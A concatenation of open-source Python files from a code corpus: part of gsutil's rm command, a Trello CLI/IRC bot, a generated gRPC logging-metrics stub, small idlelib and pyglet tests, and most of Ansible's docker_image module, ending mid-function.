# Cannot seek ahead with stdin args, since we can only iterate them
# once without buffering in memory.
if not self.read_args_from_stdin:
seek_ahead_iterator = SeekAheadNameExpansionIterator(
self.command_name, self.debug, self.GetSeekAheadGsutilApi(),
url_strs, self.recursion_requested,
all_versions=self.all_versions, project_id=self.project_id)
# Perform remove requests in parallel (-m) mode, if requested, using
# configured number of parallel processes and threads. Otherwise,
# perform requests with sequential function calls in current process.
self.Apply(_RemoveFuncWrapper, name_expansion_iterator,
_RemoveExceptionHandler,
fail_on_error=(not self.continue_on_error),
shared_attrs=['op_failure_count', 'bucket_not_found_count'],
seek_ahead_iterator=seek_ahead_iterator)
# Assuming the bucket has versioning enabled, url's that don't map to
# objects should throw an error even with all_versions, since the prior
# round of deletes only sends objects to a history table.
# This assumption that rm -a is only called for versioned buckets should be
# corrected, but the fix is non-trivial.
except CommandException as e:
# Don't raise if there are buckets to delete -- it's valid to say:
# gsutil rm -r gs://some_bucket
# if the bucket is empty.
if _ExceptionMatchesBucketToDelete(self.bucket_strings_to_delete, e):
DecrementFailureCount()
else:
raise
except ServiceException, e:
if not self.continue_on_error:
raise
if self.bucket_not_found_count:
raise CommandException('Encountered non-existent bucket during listing')
if self.op_failure_count and not self.continue_on_error:
raise CommandException('Some files could not be removed.')
# If this was a gsutil rm -r command covering any bucket subdirs,
# remove any dir_$folder$ objects (which are created by various web UI
# tools to simulate folders).
if self.recursion_requested:
folder_object_wildcards = []
for url_str in url_strs:
url = StorageUrlFromString(url_str)
if url.IsObject():
folder_object_wildcards.append('%s**_$folder$' % url_str)
if folder_object_wildcards:
self.continue_on_error = True
try:
name_expansion_iterator = NameExpansionIterator(
self.command_name, self.debug,
self.logger, self.gsutil_api,
folder_object_wildcards, self.recursion_requested,
project_id=self.project_id,
all_versions=self.all_versions)
# When we're removing folder objects, always continue on error
self.Apply(_RemoveFuncWrapper, name_expansion_iterator,
_RemoveFoldersExceptionHandler,
fail_on_error=False)
except CommandException as e:
# Ignore exception from name expansion due to an absent folder file.
if not e.reason.startswith(NO_URLS_MATCHED_GENERIC):
raise
# Now that all data has been deleted, delete any bucket URLs.
for url in bucket_urls_to_delete:
self.logger.info('Removing %s...', url)
@Retry(NotEmptyException, tries=3, timeout_secs=1)
def BucketDeleteWithRetry():
self.gsutil_api.DeleteBucket(url.bucket_name, provider=url.scheme)
BucketDeleteWithRetry()
if self.op_failure_count:
plural_str = 's' if self.op_failure_count else ''
raise CommandException('%d file%s/object%s could not be removed.' % (
self.op_failure_count, plural_str, plural_str))
return 0
def RemoveFunc(self, name_expansion_result, thread_state=None):
gsutil_api = GetCloudApiInstance(self, thread_state=thread_state)
exp_src_url = name_expansion_result.expanded_storage_url
self.logger.info('Removing %s...', exp_src_url)
gsutil_api.DeleteObject(
exp_src_url.bucket_name, exp_src_url.object_name,
preconditions=self.preconditions, generation=exp_src_url.generation,
provider=exp_src_url.scheme)
PutToQueueWithTimeout(gsutil_api.status_queue,
MetadataMessage(message_time=time.time()))
| fishjord/gsutil | gslib/commands/rm.py | Python | apache-2.0 | 15,054 |
#!/usr/bin/env python
''' Interact with Trello API as a CLI or Sopel IRC bot module '''
import argparse
from datetime import date
from email.mime.text import MIMEText
import json
import os
import re
import smtplib
import sys
# sopel is only for IRC bot installation. Not required for CLI
try:
import sopel.module # pylint: disable=import-error
except ImportError:
pass
try:
from urllib import urlencode
from urllib2 import HTTPError, Request, urlopen
except ImportError:
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen
# constants
DEFAULT_LIST = "Active"
DEFAULT_SNOWFLAKE_LIST = "Snowflakes"
DEFAULT_RESOLVED_LIST = "Resolved"
BASE_URL = "https://api.trello.com/1"
EMAIL_SERVER = 'smtp.redhat.com'
EMAIL_FROM = '[email protected]'
EMAIL_REPLYTO = '[email protected]'
class Trello(object):
"""Trello object"""
def __init__(self):
"""Set object params"""
self.args = None
self.api_key = os.environ.get("trello_consumer_key", None)
self.oauth_token = os.environ.get("trello_oauth_token", None)
self.board_id = os.environ.get("trello_board_id", None)
self.board_id_long = os.environ.get("trello_board_id_long", None)
self.email_addresses = os.environ.get("trello_report_email_addresses", None)
@staticmethod
def parse_args():
"""Parse CLI arguments"""
parser = argparse.ArgumentParser(
description='Create, comment, move Trello cards, also reporting.')
subparsers = parser.add_subparsers(help='sub-command help')
parser_get = subparsers.add_parser('get',
help="""Get board information:
card list, user list or
card details""")
parser_get.add_argument(
'card',
nargs='?',
metavar='CARD_URL',
help='Card short URL to get details for')
parser_get.add_argument(
'--list', '-l',
metavar='TRELLO_LIST',
default=DEFAULT_LIST,
help='List to display cards from, e.g. "Resolved" or "Snowflakes"')
parser_get.add_argument(
'--users', '-u',
action='store_true',
help='Display board users')
parser_get.set_defaults(action='get')
parser_create = subparsers.add_parser('create',
help='Create a new card')
parser_create.set_defaults(action='create')
parser_create.add_argument(
'title', metavar='TITLE',
help='Card title')
parser_update = subparsers.add_parser('update',
help='Update an existing card')
parser_update.set_defaults(action='update')
parser_update.add_argument(
'card', metavar='CARD', help='Existing card URL')
parser_update.add_argument(
'--comment', '-c',
help='Add a comment')
parser_update.add_argument(
'--move', '-m',
metavar='LIST_NAME',
help='Move card to another list, e.g. "Resolved" or "Snowflakes"')
parser_update.add_argument(
'--assign', '-a',
metavar='USER',
help='Attach Trello user to card')
parser_update.add_argument(
'--unassign', '-u',
metavar='USER',
help='Remove Trello user from card')
parser_report = subparsers.add_parser('report',
help="Generate reports")
parser_report.set_defaults(action='report')
parser_report.add_argument(
'--email', '-e',
metavar='ADDRESS[,ADDRESS]',
help="""Comma-separated (no spaces) list of email addresses to
send report to. Overrides env var 'trello_report_email_addresses'""")
parser_report.add_argument(
'--move', '-m',
action='store_true',
help='Move cards to end-of-week list')
return parser.parse_args()
def create(self, title=None):
"""Create card"""
if not title:
title = self.args.title
card = self.trello_create(title)
return card['shortUrl']
def update(self):
"""Update card"""
if self.trello_update(self.card_id(self.args.card)):
print("Updated")
else:
sys.exit("No updates applied")
def get(self):
"""Get card details or list of cards"""
cards = None
if self.args.card:
return json.dumps(self.trello_get(self.card_id()), indent=4)
cards = self.trello_get()
results = ''
for card in cards:
members = ''
if self.args.users:
results += '{} {}\n'.format(str(card['username']),
str(card['fullName']))
else:
for member in card['idMembers']:
if member:
members += str(self.member_username(member)) + ' '
results += '{} {} ({})\n'.format(str(card['shortUrl']),
str(card['name']),
members)
return results
def report(self, email=None, move=False):
"""Generate reports"""
payload = self.report_payload()
print(payload)
_env_email = os.environ.get("trello_report_email_addresses", None)
if _env_email:
email = _env_email
if self.args:
if self.args.email:
email = self.args.email
if self.args.move:
move = self.args.move
week_number = date.today().isocalendar()[1]
if email:
subj = "OpenShift SRE Report for Week #{} (ending {})".format(
week_number, date.today().strftime("%d-%m-%Y"))
_board_url = "https://trello.com/b/{}".format(
os.environ.get("trello_board_id", None))
payload = "For more information visit the SRE 24x7 board {}\n\n{}".format(
_board_url, payload)
self.email_report(email, subj, payload)
print("Report emailed to {}".format(email))
if move:
list_name = "Week #{}".format(week_number)
if self.move_cards(to_list=list_name):
print("Cards moved to list '{}'".format(list_name))
def report_payload(self):
"""Return report payload
:return: formatted report"""
data = ""
resolved_cards = self.get_list_cards(DEFAULT_RESOLVED_LIST)
data += "{}: {}\n".format(DEFAULT_LIST,
len(self.get_list_cards(DEFAULT_LIST)))
data += "{}: {}\n".format(DEFAULT_SNOWFLAKE_LIST,
len(self.get_list_cards(DEFAULT_SNOWFLAKE_LIST)))
data += "{}: {}\n".format(DEFAULT_RESOLVED_LIST,
len(resolved_cards))
data += "\n---\nResolved issues:\n---\n"
for card in resolved_cards:
data += "{} {}\n".format(card['shortUrl'], card['name'])
return data
def move_cards(self, to_list, from_list=None):
"""Move cards from one list to another
:param to_list (required): name of list to move cards to
:param from_list (optional, use default): name of list to move card from
:return: None"""
params = {}
if not to_list:
print("Cannot move: no destination list provided")
return False
if not from_list:
from_list = DEFAULT_RESOLVED_LIST
to_list_id = self.create_list(to_list)
path = "/lists/" + self.get_list_id(from_list) + "/moveAllCards"
params['idBoard'] = self.board_id_long
params['idList'] = to_list_id
return self.make_request(path, 'POST', params)
def create_list(self, name=None):
"""Create new list
:param name: name of list
:return: list ID"""
params = {}
params['name'] = name
params['idBoard'] = self.board_id_long
params['pos'] = "bottom"
newlist = self.make_request('/lists', 'POST', params)
return newlist['id']
@staticmethod
def email_report(email, subj, body):
"""Email report
:param email: email address
:param subj: email subject
:param body: email body
:return: None"""
msg = MIMEText(body)
msg['Subject'] = subj
msg['From'] = EMAIL_FROM
msg['To'] = email
msg['Reply-to'] = EMAIL_REPLYTO
smtpcxn = smtplib.SMTP(host=EMAIL_SERVER, port='25')
smtpcxn.sendmail(email, email, msg.as_string())
smtpcxn.quit()
def get_list_cards(self, trello_list=DEFAULT_LIST):
"""Return card total for given list
:param trello_list: list name
:return: cards array"""
path = "/lists/%s/cards" % self.get_list_id(trello_list)
return self.make_request(path)
def trello_update(self, card_id, **kwargs):
"""Call trello update API
:param card_id: card ID
:return: success boolean"""
params = {}
path = None
updated = False
# handle being called via CLI or bot
if self.args:
if self.args.comment:
kwargs['comment'] = self.args.comment
if self.args.move:
kwargs['move'] = self.args.move
if self.args.assign:
kwargs['assign'] = self.args.assign
if self.args.unassign:
kwargs['unassign'] = self.args.unassign
# Since the trello API is different calls/methods for different data
# we call multiple times
if 'comment' in kwargs:
params['text'] = kwargs['comment']
path = '/cards/' + card_id + '/actions/comments'
updated = self.make_request(path, "POST", params)
if 'resolve' in kwargs:
params['idList'] = self.get_list_id(DEFAULT_RESOLVED_LIST)
path = '/cards/' + card_id
updated = self.make_request(path, "PUT", params)
if 'move' in kwargs:
params['idList'] = self.get_list_id(kwargs['move'])
path = '/cards/' + card_id
updated = self.make_request(path, "PUT", params)
if 'assign' in kwargs:
params['value'] = self.member_id(kwargs['assign'])
path = '/cards/' + card_id + '/idMembers'
updated = self.make_request(path, "POST", params)
if 'unassign' in kwargs:
path = '/cards/' + card_id + '/idMembers/' + self.member_id(kwargs['unassign'])
updated = self.make_request(path, "DELETE", params)
return updated
def trello_create(self, title):
"""Call trello create API
:param title: name/title of card
:return: card"""
params = {}
params['idList'] = self.get_list_id()
params['name'] = title
path = '/cards'
return self.make_request(path, "POST", params)
def member_username(self, memberid):
"""Get member username from member ID"""
member = self.make_request('/members/' + memberid)
return member['username']
def member_id(self, username):
"""Get member id from username"""
members = self.make_request('/boards/' + self.board_id + '/members/')
for member in members:
if username == member['username']:
return member['id']
def card_id(self, url=None):
"""Return parsed card ID from URL
example: https://trello.com/c/PZlOHgGm
returns: PZlOHgGm
:param url: trello short URL
:return: trello card ID"""
if not url:
url = self.args.card
parsed_uri = url.split("/")
return parsed_uri[-1]
def get_list_id(self, list_id=None):
"""Return the list ID
:param list_id: list ID if not default
:return: list_id"""
default = DEFAULT_LIST
if list_id:
default = list_id
path = '/boards/' + self.board_id + '/lists/'
lists = self.make_request(path)
# match board name regardless of case
pattern = re.compile(default, re.I)
for board_list in lists:
if re.match(pattern, board_list['name']):
return board_list['id']
sys.exit("List '%s' not found" % list_id)
def trello_get(self, card_id=None):
"""Get trello cards
:param card_id: trello card ID
:return: trello json"""
path = None
if card_id:
path = '/cards/' + card_id
elif self.args.users:
path = '/boards/' + self.board_id + '/members'
else:
path = '/lists/' + self.get_list_id(self.args.list) + '/cards'
results = self.make_request(path)
return results
def make_request(self, path, method="GET", params=None):
"""Trello API call
:param path: trello API path
:param method: rest call method
:param params: API params
:return: trello json"""
if not params:
params = {}
params['key'] = self.api_key
params['token'] = self.oauth_token
url = BASE_URL + path
data = None
if method == "GET":
url += '?' + urlencode(params)
elif method in ['DELETE', 'POST', 'PUT']:
data = urlencode(params).encode('utf-8')
request = Request(url)
if method in ['DELETE', 'PUT']:
request.get_method = lambda: method
try:
if data:
response = urlopen(request, data=data)
else:
response = urlopen(request)
except HTTPError as err:
print(err)
print(err.read())
result = None
else:
result = json.loads(response.read().decode('utf-8'))
return result
def get_trello_id(ircnick):
"""Return trello ID for a given IRC nick"""
key = 'IRCNICK_' + ircnick
try:
return os.environ[key]
except KeyError:
print("%s, you need to map your IRC nick with Trello username" % ircnick)
return None
@sopel.module.commands('issue')
def issue(bot, trigger):
"""Record a new issue in Trello, e.g. '.issue Some issue text'"""
trellobot = Trello()
card = trellobot.trello_create(trigger.group(2))
bot.say(card['shortUrl'])
if not trellobot.trello_update(trellobot.card_id(card['shortUrl']),
assign=get_trello_id(trigger.nick)):
bot.reply(
"you need to map your IRC nick with Trello username." +
"See https://github.com/openshift/openshift-ansible-ops/tree/prod/playbooks/adhoc/ircbot")
@sopel.module.commands('comment')
def comment(bot, trigger):
"""Add comment to a trello card, e.g. '.comment <trelloShortUrl> My comment'"""
trellobot = Trello()
msg = trigger.group(2).partition(' ')
trellobot.trello_update(trellobot.card_id(msg[0]), comment=msg[2])
bot.say('Comment added')
@sopel.module.commands('resolve', 'resolved')
def resolve(bot, trigger):
"""Resolve a trello card, e.g. '.resolve <trelloShortUrl>'"""
trellobot = Trello()
if trellobot.trello_update(trellobot.card_id(trigger.group(2)), resolve=True):
card = trellobot.trello_get(trellobot.card_id(trigger.group(2)))
bot.say('Resolved {}: {}'.format(trigger.group(2), card['name']))
else:
bot.say('Could not resolve %s' % trigger.group(2))
def main():
"""
main() function
:return:
"""
trello = Trello()
trello.args = Trello.parse_args()
if trello.args.action is 'create':
print(trello.create())
elif trello.args.action is 'get':
print(trello.get())
elif trello.args.action is 'update':
trello.update()
elif trello.args.action is 'report':
trello.report()
if __name__ == "__main__":
main()
| appuio/ansible-role-openshift-zabbix-monitoring | vendor/openshift-tools/openshift_tools/ircbot/trello/trello.py | Python | apache-2.0 | 16,279 |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
import google.cloud.proto.logging.v2.logging_metrics_pb2 as google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2
import google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2
class MetricsServiceV2Stub(object):
"""Service for configuring logs-based metrics.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ListLogMetrics = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/ListLogMetrics',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsResponse.FromString,
)
self.GetLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/GetLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.GetLogMetricRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.FromString,
)
self.CreateLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/CreateLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.CreateLogMetricRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.FromString,
)
self.UpdateLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/UpdateLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.UpdateLogMetricRequest.SerializeToString,
response_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.FromString,
)
self.DeleteLogMetric = channel.unary_unary(
'/google.logging.v2.MetricsServiceV2/DeleteLogMetric',
request_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.DeleteLogMetricRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MetricsServiceV2Servicer(object):
"""Service for configuring logs-based metrics.
"""
def ListLogMetrics(self, request, context):
"""Lists logs-based metrics.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLogMetric(self, request, context):
"""Gets a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateLogMetric(self, request, context):
"""Creates a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateLogMetric(self, request, context):
"""Creates or updates a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteLogMetric(self, request, context):
"""Deletes a logs-based metric.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MetricsServiceV2Servicer_to_server(servicer, server):
rpc_method_handlers = {
'ListLogMetrics': grpc.unary_unary_rpc_method_handler(
servicer.ListLogMetrics,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.ListLogMetricsResponse.SerializeToString,
),
'GetLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.GetLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.GetLogMetricRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.SerializeToString,
),
'CreateLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.CreateLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.CreateLogMetricRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.SerializeToString,
),
'UpdateLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.UpdateLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.UpdateLogMetricRequest.FromString,
response_serializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.LogMetric.SerializeToString,
),
'DeleteLogMetric': grpc.unary_unary_rpc_method_handler(
servicer.DeleteLogMetric,
request_deserializer=google_dot_cloud_dot_proto_dot_logging_dot_v2_dot_logging__metrics__pb2.DeleteLogMetricRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.logging.v2.MetricsServiceV2', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| eoogbe/api-client-staging | generated/python/proto-google-cloud-logging-v2/google/cloud/proto/logging/v2/logging_metrics_pb2_grpc.py | Python | bsd-3-clause | 5,957 |
''' Test idlelib.debugger.
Coverage: 19%
'''
from idlelib import debugger
from test.support import requires
requires('gui')
import unittest
from tkinter import Tk
class NameSpaceTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.root = Tk()
cls.root.withdraw()
@classmethod
def tearDownClass(cls):
cls.root.destroy()
del cls.root
def test_init(self):
debugger.NamespaceViewer(self.root, 'Test')
if __name__ == '__main__':
unittest.main(verbosity=2)
| yotchang4s/cafebabepy | src/main/python/idlelib/idle_test/test_debugger.py | Python | bsd-3-clause | 533 |
#!/usr/bin/env python
'''Test RGBA load using the platform decoder (QuickTime, Quartz, GDI+ or Gdk).
You should see the rgba.png image on a checkboard background.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import unittest
import base_load
import sys
if sys.platform == 'linux2':
from pyglet.image.codecs.gdkpixbuf2 import GdkPixbuf2ImageDecoder as dclass
elif sys.platform in ('win32', 'cygwin'):
from pyglet.image.codecs.gdiplus import GDIPlusDecoder as dclass
elif sys.platform == 'darwin':
from pyglet import options as pyglet_options
if pyglet_options['darwin_cocoa']:
from pyglet.image.codecs.quartz import QuartzImageDecoder as dclass
else:
from pyglet.image.codecs.quicktime import QuickTimeImageDecoder as dclass
class TEST_PLATFORM_RGBA_LOAD(base_load.TestLoad):
texture_file = 'rgba.png'
decoder = dclass()
if __name__ == '__main__':
unittest.main()
| mpasternak/pyglet-fix-issue-518-522 | tests/image/PLATFORM_RGBA_LOAD.py | Python | bsd-3-clause | 963 |
#!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
module: docker_image
short_description: Manage docker images.
version_added: "1.5"
description:
- Build, load or pull an image, making the image available for creating containers. Also supports tagging an
image into a repository and archiving an image to a .tar file.
options:
archive_path:
description:
- Use with state C(present) to archive an image to a .tar file.
required: false
version_added: "2.1"
load_path:
description:
- Use with state C(present) to load an image from a .tar file.
required: false
version_added: "2.2"
dockerfile:
description:
- Use with state C(present) to provide an alternate name for the Dockerfile to use when building an image.
default: Dockerfile
required: false
version_added: "2.0"
force:
description:
- Use with state I(absent) to un-tag and remove all images matching the specified name. Use with state
C(present) to build, load or pull an image when the image already exists.
default: false
required: false
version_added: "2.1"
http_timeout:
description:
- Timeout for HTTP requests during the image build operation. Provide a positive integer value for the number of
seconds.
required: false
version_added: "2.1"
name:
description:
- "Image name. Name format will be one of: name, repository/name, registry_server:port/name.
When pushing or pulling an image the name can optionally include the tag by appending ':tag_name'."
required: true
path:
description:
- Use with state 'present' to build an image. Will be the path to a directory containing the context and
Dockerfile for building an image.
aliases:
- build_path
required: false
pull:
description:
- When building an image downloads any updates to the FROM image in Dockerfile.
default: true
required: false
version_added: "2.1"
push:
description:
- Push the image to the registry. Specify the registry as part of the I(name) or I(repository) parameter.
default: false
required: false
version_added: "2.2"
rm:
description:
- Remove intermediate containers after build.
default: true
required: false
version_added: "2.1"
nocache:
description:
- Do not use cache when building an image.
default: false
required: false
repository:
description:
- Full path to a repository. Use with state C(present) to tag the image into the repository. Expects
format I(repository:tag). If no tag is provided, will use the value of the C(tag) parameter or I(latest).
required: false
version_added: "2.1"
state:
description:
- Make assertions about the state of an image.
- When C(absent) an image will be removed. Use the force option to un-tag and remove all images
matching the provided name.
- When C(present) check if an image exists using the provided name and tag. If the image is not found or the
force option is used, the image will either be pulled, built or loaded. By default the image will be pulled
from Docker Hub. To build the image, provide a path value set to a directory containing a context and
Dockerfile. To load an image, specify load_path to provide a path to an archive file. To tag an image to a
repository, provide a repository path. If the name contains a repository path, it will be pushed.
- "NOTE: C(build) is DEPRECATED and will be removed in release 2.3. Specifying C(build) will behave the
same as C(present)."
required: false
default: present
choices:
- absent
- present
- build
tag:
description:
- Used to select an image when pulling. Will be added to the image when pushing, tagging or building. Defaults to
I(latest).
- If C(name) parameter format is I(name:tag), then tag value from C(name) will take precedence.
default: latest
required: false
buildargs:
description:
- Provide a dictionary of C(key:value) build arguments that map to Dockerfile ARG directive.
- Docker expects the value to be a string. For convenience any non-string values will be converted to strings.
- Requires Docker API >= 1.21 and docker-py >= 1.7.0.
type: complex
required: false
version_added: "2.2"
container_limits:
description:
- A dictionary of limits applied to each container created by the build process.
required: false
version_added: "2.1"
type: complex
contains:
memory:
description: Set memory limit for build
type: int
memswap:
description: Total memory (memory + swap), -1 to disable swap
type: int
cpushares:
description: CPU shares (relative weight)
type: int
cpusetcpus:
description: CPUs in which to allow execution, e.g., "0-3", "0,1"
type: str
use_tls:
description:
- "DEPRECATED. Whether to use tls to connect to the docker server. Set to C(no) when TLS will not be used. Set to
C(encrypt) to use TLS. And set to C(verify) to use TLS and verify that the server's certificate is valid for the
server. NOTE: If you specify this option, it will set the value of the tls or tls_verify parameters."
choices:
- no
- encrypt
- verify
default: no
required: false
version_added: "2.0"
extends_documentation_fragment:
- docker
requirements:
- "python >= 2.6"
- "docker-py >= 1.7.0"
- "Docker API >= 1.20"
authors:
- Pavel Antonov (@softzilla)
- Chris Houseknecht (@chouseknecht)
- James Tanner (@jctanner)
'''
EXAMPLES = '''
- name: pull an image
docker_image:
name: pacur/centos-7
- name: Tag and push to docker hub
docker_image:
name: pacur/centos-7
repository: dcoppenhagan/myimage
tag: 7.0
push: yes
- name: Tag and push to local registry
docker_image:
name: centos
repository: localhost:5000/centos
tag: 7
push: yes
- name: Remove image
docker_image:
state: absent
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
- name: Build an image and push it to a private repo
docker_image:
path: ./sinatra
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
push: yes
- name: Archive image
docker_image:
name: registry.ansible.com/chouseknecht/sinatra
tag: v1
archive_path: my_sinatra.tar
- name: Load image from archive and push to a private registry
docker_image:
name: localhost:5000/myimages/sinatra
tag: v1
push: yes
load_path: my_sinatra.tar
- name: Build image and with buildargs
docker_image:
path: /path/to/build/dir
name: myimage
buildargs:
log_volume: /var/log/myapp
listen_port: 8080
'''
RETURN = '''
image:
description: Image inspection results for the affected image.
returned: success
type: complex
sample: {}
'''
from ansible.module_utils.docker_common import *
try:
from docker.auth.auth import resolve_repository_name
from docker.utils.utils import parse_repository_tag
except ImportError:
# missing docker-py handled in docker_common
pass
class ImageManager(DockerBaseClass):
def __init__(self, client, results):
super(ImageManager, self).__init__()
self.client = client
self.results = results
parameters = self.client.module.params
self.check_mode = self.client.check_mode
self.archive_path = parameters.get('archive_path')
self.container_limits = parameters.get('container_limits')
self.dockerfile = parameters.get('dockerfile')
self.force = parameters.get('force')
self.load_path = parameters.get('load_path')
self.name = parameters.get('name')
self.nocache = parameters.get('nocache')
self.path = parameters.get('path')
self.pull = parameters.get('pull')
self.repository = parameters.get('repository')
self.rm = parameters.get('rm')
self.state = parameters.get('state')
self.tag = parameters.get('tag')
self.http_timeout = parameters.get('http_timeout')
self.push = parameters.get('push')
self.buildargs = parameters.get('buildargs')
# If name contains a tag, it takes precedence over tag parameter.
repo, repo_tag = parse_repository_tag(self.name)
if repo_tag:
self.name = repo
self.tag = repo_tag
if self.state in ['present', 'build']:
self.present()
elif self.state == 'absent':
self.absent()
def fail(self, msg):
self.client.fail(msg)
def present(self):
'''
Handles state = 'present', which includes building, loading or pulling an image,
depending on user provided parameters.
:returns None
'''
image = self.client.find_image(name=self.name, tag=self.tag)
if not image or self.force:
if self.path:
# Build the image
if not os.path.isdir(self.path):
self.fail("Requested build path %s could not be found or you do not have access." % self.path)
image_name = self.name
if self.tag:
image_name = "%s:%s" % (self.name, self.tag)
self.log("Building image %s" % image_name)
self.results['actions'].append("Built image %s from %s" % (image_name, self.path))
self.results['changed'] = True
if not self.check_mode:
self.results['image'] = self.build_image()
elif self.load_path:
# Load the image from an archive
if not os.path.isfile(self.load_path):
self.fail("Error loading image %s. Specified path %s does not exist." % (self.name,
self.load_path))
image_name = self.name
if self.tag:
image_name = "%s:%s" % (self.name, self.tag)
self.results['actions'].append("Loaded image %s from %s" % (image_name, self.load_path))
self.results['changed'] = True
if not self.check_mode:
self.results['image'] = self.load_image()
else:
# pull the image
self.results['actions'].append('Pulled image %s:%s' % (self.name, self.tag))
self.results['changed'] = True
if not self.check_mode:
self.results['image'] = self.client.pull_image(self.name, tag=self.tag)
if self.archive_path:
self.archive_image(self.name, self.tag)
if self.push and not self.repository:
self.push_image(self.name, self.tag)
elif self.repository:
self.tag_image(self.name, self.tag, self.repository, force=self.force, push=self.push)
def absent(self):
'''
Handles state = 'absent', which removes an image.
:return None
'''
image = self.client.find_image(self.name, self.tag)
if image:
name = self.name
if self.tag:
name = "%s:%s" % (self.name, self.tag)
if not self.check_mode:
try:
self.client.remove_image(name, force=self.force)
except Exception as exc:
self.fail("Error removing image %s - %s" % (name, str(exc)))
self.results['changed'] = True
self.results['actions'].append("Removed image %s" % (name))
self.results['image']['state'] = 'Deleted'
def archive_image(self, name, tag):
'''
Archive an image to a .tar file. Called when archive_path is passed.
:param name - name of the image. Type: str
:return None
'''
if not tag:
tag = "latest"
image = self.client.find_image(name=name, tag=tag)
if not image:
self.log("archive image: image %s:%s not found" % (name, tag))
return
image_name = "%s:%s" % (name, tag)
self.results['actions'].append('Archived image %s to %s' % (image_name, self.archive_path))
self.results['changed'] = True
if not self.check_mode:
self.log("Getting archive of image %s" % image_name)
try:
image = self.client.get_image(image_name)
except Exception as exc:
self.fail("Error getting image %s - %s" % (image_name, str(exc)))
try:
image_tar = open(self.archive_path, 'w')
image_tar.write(image.data)
image_tar.close()
except Exception as exc:
self.fail("Error writing image archive %s - %s" % (self.archive_path, str(exc)))
image = self.client.find_image(name=name, tag=tag)
if image:
self.results['image'] = image
def push_image(self, name, tag=None):
'''
If the name of the image contains a repository path, then push the image.
:param name Name of the image to push.
:param tag Use a specific tag.
:return: None
'''
repository = name
if not tag:
repository, tag = parse_repository_tag(name)
registry, repo_name = resolve_repository_name(repository)
self.log("push %s to %s/%s:%s" % (self.name, registry, repo_name, tag))
if registry:
self.results['actions'].append("Pushed image %s to %s/%s:%s" % (self.name, registry, repo_name, tag))
self.results['changed'] = True
